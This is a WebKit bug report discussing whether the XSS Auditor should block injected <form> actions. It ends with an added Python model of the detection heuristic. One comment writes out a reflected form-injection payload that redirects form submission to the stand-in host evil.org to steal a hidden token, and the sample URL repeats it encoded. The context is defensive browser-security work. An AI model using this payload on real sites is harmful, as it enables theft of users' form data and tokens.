RESOLVED WONTFIX 72585
XSS Auditor : <form> action is blocked even if it is not a JavaScript URL
https://bugs.webkit.org/show_bug.cgi?id=72585
prakash.1729
Reported 2011-11-17 01:18:33 PST
I observed that when I try to inject a FORM the "action" attribute is made empty even if it is not a JavaScript URL. So is this an exception?
Adam Barth
Comment 1 2011-11-17 01:27:09 PST
Yeah, we should only need to block JavaScript URLs. (This is a false positive, so not a security bug.)
prakash.1729
Comment 2 2011-11-17 02:23:25 PST
Though it is a false positive according to the design, it is in fact protecting against <form> injection, which is good. It is the same with <iframe> injection, where the src attribute is removed even if the src is not a JavaScript URL. One more corner case is that an <iframe> from the same domain can be injected successfully. I assume this is a design decision. P.S. I couldn't find an example in which detecting an injected form is a false positive.
Thomas Sepez
Comment 3 2012-02-27 10:36:21 PST
Looking at this old XSSAuditor bug, I think that blocking form actions to off-domain http locations when a <form> is injected is the right thing to do (i.e. we need to block more than just the javascript URLs as Adam suggests in Comment #1). Just so we're all on the same page, the case I'm considering (apologies if this is obvious) is when the page contains:

<form action="http://good.com">
<input type="text" name="quantity" value="2">
<input type="hidden" name="formkey" value="91812727123812">
<input type="submit">
</form>

and the "quantity" input element contains an injection, and we reflect from the URL, say

...?quantity="></form><form action="http://evil.org">

resulting in the page:

<form action="http://good.com">
<input type="text" name="quantity" value=""></form><form action="http://evil.org">
<input type="hidden" name="formkey" value="91812727123812">
<input type="submit">
</form>

So when the user hits submit, we steal his formkey token (or other information from input fields). Please re-open if you disagree, or if you find that this is being triggered in the absence of both a reflected "<form" tag and a reflected "action" attribute. Thanks heaps.
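The check argued for in Comment 3, as an added example that is not WebKit's code: a simplified Python model of the auditor heuristic (a <form> whose opening tag is reflected in the request query and whose action is a javascript: URL or points to another host gets its action blanked), run over a constructed copy of the page from Comment 3. The function names, the loose string-matching rule and the sample URL encoding are assumptions made for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit, unquote

# Hypothetical, simplified model of the auditor check discussed in Comment 3
# (not WebKit's implementation): a <form> whose opening tag is reflected from
# the request URL and whose action is javascript: or off-origin is neutralised.

class _FormTags(HTMLParser):
    """Collects (raw opening-tag text, attributes) for every <form> on the page."""
    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.forms.append((self.get_starttag_text(), dict(attrs)))

def _norm(text):
    # Loose comparison: URL-decoded, whitespace collapsed, case-folded
    return re.sub(r"\s+", " ", unquote(text)).strip().lower()

def find_injected_forms(request_url, response_html):
    """Return [(raw_tag, action)] for forms that look both reflected and dangerous."""
    parts = urlsplit(request_url)
    query = _norm(parts.query)
    parser = _FormTags()
    parser.feed(response_html)
    hits = []
    for raw_tag, attrs in parser.forms:
        action = attrs.get("action") or ""
        target = urlsplit(action)
        is_js = target.scheme.lower() == "javascript"
        off_origin = bool(target.hostname) and target.hostname != parts.hostname
        if _norm(raw_tag) in query and (is_js or off_origin):
            hits.append((raw_tag, action))
    return hits

def neutralise(request_url, response_html):
    """Blank the action attribute of each injected form, as the bug report describes."""
    for raw_tag, _ in find_injected_forms(request_url, response_html):
        fixed = re.sub(r'action\s*=\s*(["\']).*?\1', 'action=""', raw_tag, count=1, flags=re.I)
        response_html = response_html.replace(raw_tag, fixed)
    return response_html

# Constructed sample reproducing the scenario in Comment 3 (percent-encoded query)
REQUEST_URL = ("http://good.com/order?quantity=%22%3E%3C/form%3E"
               "%3Cform%20action%3D%22http://evil.org%22%3E")
RESPONSE_HTML = ('<form action="http://good.com"> <input type="text" name="quantity" value="">'
                 '</form><form action="http://evil.org"> <input type="hidden" name="formkey" '
                 'value="91812727123812"> <input type="submit"> </form>')
```

The legitimate good.com form is left untouched because its opening tag never appears in the query, which is the distinction Thomas asks reporters to check before re-opening.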